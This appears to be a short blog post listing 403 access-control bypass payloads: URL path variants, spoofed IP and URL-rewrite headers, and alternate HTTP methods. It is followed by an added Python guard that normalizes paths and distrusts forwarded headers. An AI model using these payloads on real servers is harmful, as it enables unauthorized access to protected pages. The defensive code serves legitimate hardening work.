Preface: I have been busy with other things this year, so the blog gets updated whenever I get around to it.
URLBypass
Lastpath is the part of the URI after the last "/"; for example, in "https://test.com/test/admin" the Lastpath is "admin".
- "%2e/"+Lastpath
- Lastpath+"/."
- "./"+Lastpath+"/./"
- Lastpath+"%20"
- Lastpath+"%20/"
- Lastpath+"%09"
- Lastpath+"%09/"
- Lastpath+"%00"
- Lastpath+"%00/"
- "%20"+Lastpath+"%20/"
- Lastpath+"..;/"
- Lastpath+"/..;/"
- Lastpath+"?"
- Lastpath+"??"
- Lastpath+"???"
- "/"+Lastpath+"//"
- Lastpath+"/"
- Lastpath+".randomstring"
- Lastpath+"/*"
- Lastpath+"/*/"
- Lastpath+"/%2f/"
- Lastpath+"%0d%0a"
- "%3b"+Lastpath
- ";/"+Lastpath
- "/"+Lastpath
- Lastpath+"#"
- Lastpath+"/%3b/"
HttpHeaderBypass
- X-Custom-IP-Authorization: 127.0.0.1
- X-Forwarded-For: 127.0.0.1
- X-Forward-For: 127.0.0.1
- Y-Forward-For: 127.0.0.1
- X-Remote-IP: 127.0.0.1
- X-Originating-IP: 127.0.0.1
- X-Remote-Addr: 127.0.0.1
- X-Client-IP: 127.0.0.1
- X-Real-IP: 127.0.0.1
- X-Rewrite-URL: +OriginalUrl
- X-Original-URL: +OriginalUrl
- Referer: /+Lastpath
- X-Host: 127.0.0.1
- X-Forwarded-Host: 127.0.0.1
Change the request method
https://www.bbsmax.com/A/1O5EMGZy57/
GET, POST, HEAD, PUT, TRACK, TRACE, DELETE
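All three lists above work when the component enforcing access control parses the request differently from the backend that serves it. The Python below is an added defender-side guard, not code from the original post: it canonicalizes the path so the encoding, dot-segment, path-parameter and whitespace variants listed above collapse to one form before the prefix check, honours X-Forwarded-For only from a trusted proxy, and rejects unexpected methods. The protected prefix /admin, the trusted proxy 10.0.0.2, the 10.0.0. admin network and the method allowlist are constructed assumptions for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed policy for this example (not from the original post).
PROTECTED_PREFIXES = ("/admin",)
ALLOWED_METHODS = {"GET", "POST", "HEAD"}
TRUSTED_PROXIES = {"10.0.0.2"}        # only these may set X-Forwarded-For
ADMIN_NETWORK_PREFIX = "10.0.0."       # constructed admin allowlist


def canonical_path(raw: str) -> str:
    """Collapse the listed path variants into one form before any prefix comparison."""
    path = raw.split("?", 1)[0].split("#", 1)[0]      # drop "?", "??", "#" suffixes
    prev = None
    while prev != path:                               # decode until stable: %252e -> %2e -> .
        prev, path = path, unquote(path)              # over-decoding only errs toward denying
    segments = []
    for seg in path.split("/"):
        seg = seg.split(";", 1)[0]                    # strip path params: "..;" -> "..", ";" -> ""
        segments.append(seg.strip(" \t\r\n\x00"))     # strip %20 %09 %0d %0a %00 padding
    path = re.sub(r"/+", "/", "/" + "/".join(segments))   # collapse "//" and "/%2f/"
    return posixpath.normpath(path)                   # resolve "." and ".." segments


def is_protected(raw_path: str) -> bool:
    p = canonical_path(raw_path)
    return any(p == pre or p.startswith(pre + "/") for pre in PROTECTED_PREFIXES)


def client_ip(peer_ip: str, headers: dict) -> str:
    """Trust X-Forwarded-For only when the TCP peer is a known proxy;
    every other client-supplied IP header (X-Real-IP, X-Client-IP, ...) is ignored."""
    if peer_ip in TRUSTED_PROXIES and "X-Forwarded-For" in headers:
        return headers["X-Forwarded-For"].split(",")[0].strip()
    return peer_ip


def authorize(method: str, raw_path: str, headers: dict, peer_ip: str) -> bool:
    """Decide on the request line only; X-Original-URL / X-Rewrite-URL never override it."""
    if method.upper() not in ALLOWED_METHODS:         # TRACE, TRACK, PUT, DELETE never pass
        return False
    if not is_protected(raw_path):
        return True
    return client_ip(peer_ip, headers).startswith(ADMIN_NETWORK_PREFIX)
```

Suffixes such as ".randomstring" depend on how the backend router treats extensions, so the canonicalizer must mirror the backend's own routing rules rather than this generic one.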